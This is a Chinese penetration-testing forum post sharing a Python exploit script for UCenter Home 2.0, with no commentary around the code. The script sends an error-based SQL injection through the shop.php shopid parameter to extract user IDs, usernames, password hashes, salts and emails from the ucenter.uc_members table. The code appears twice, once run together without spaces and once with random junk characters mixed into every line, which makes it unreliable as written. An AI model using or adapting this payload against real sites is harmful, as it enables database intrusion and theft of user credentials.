找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1955|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl' n) K7 e0 v5 ~. p9 y+ z$ v; t5 [# Q
6 J" [4 m) }% s9 u; ]: v

9 ]+ M, Y& B& Y1 `#!/usr/bin/env python  ( ^7 g  M0 `' h' Z

1 M  i/ `1 O' @import sys  4 m. X2 N; ~$ c8 k1 A
import urllib2  ! {/ g+ W: N7 n0 m' w* X
import re  
- r* x8 ]+ w- _( `$ B# l& |7 j( E
6 p" a3 w1 ~& m0 A7 Qdef info():  
  }$ L; j; B% I+ U2 R) L3 p    print 'From:http://www.exploit-db.com/exploits/14997/' " c2 P- }0 K: }% j! i) G7 `
    print 'http://www.hake.cc/Web_loudong/' 2 `) R/ I8 b7 W, a* d
    print 'changed:qiaoy'  , i' q/ u+ r0 F# U
    print 'exp:'  
+ p( {; I- ^/ }2 G    print ' ./UCenter_Home_2.0.py site'  ) Z5 D4 @5 J6 G9 `& U
; y2 [3 \9 K9 V1 |# q& O' J
def main():  " d, T* ?! a& p9 W
    if len(sys.argv) != 2:  
. I  J, `8 N4 c7 v. u0 a0 Y% H        info()  ! _% _$ C; D! G1 ?* H( [
    else:  
8 M4 @/ m4 s$ M  L. y# e# y& P        site = sys.argv[1]  ) H: O6 H( f6 D5 d( ~; Z8 H
        if site[0:7] == 'http://':  
) \% h' t: {( f1 F            sitesite =site  
' g( ~' k) M; u" ?( {, Z        elif site[0:8] == 'https://':  ' n' s! V8 }$ n- a9 o
            sitesite = site  8 J5 g- c9 b: C2 K& Y. G
        else:    d9 I, |+ }9 I; |3 ^& K! L1 m
            site = 'http://'+site  0 A2 V! J# s! `; @# x0 \
        try:  
1 `* ^) J" q- K, V; U1 d            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  + h0 A, i- N7 Y, |  O! C+ r) S
            Value = urllib2.urlopen(url).read()  
0 F, h; Y. ?! P, P$ v) ~" v            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  ( J# c! w( W; h5 l& d1 a, ?2 n
            hacked = Msg.split(':')  
: }% \. ^6 y1 L/ M/ F) j6 D+ g            print 'Name:    '+hacked[1]  + F/ G3 p$ [- q8 U# S3 S: T7 G
            print 'Passwd:  '+hacked[2]  
( L4 s0 M3 g: |8 U/ U+ a9 q0 n            print 'salt:    '+hacked[3]  / K5 }* x# O2 D8 k
            print 'email:   '+hacked[4]  
) k  u, V# J" i" I        except:  
4 L  a  ]% t% [* g  C3 m            print 'Sorry,I can\'t work............'  
6 a* K  G. [5 X# F4 `2 ~* S
3 i1 r7 e: d. R1 k! N% |if __name__ == '__main__':  " `# y0 G' f) p! b( `5 s3 |5 x
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表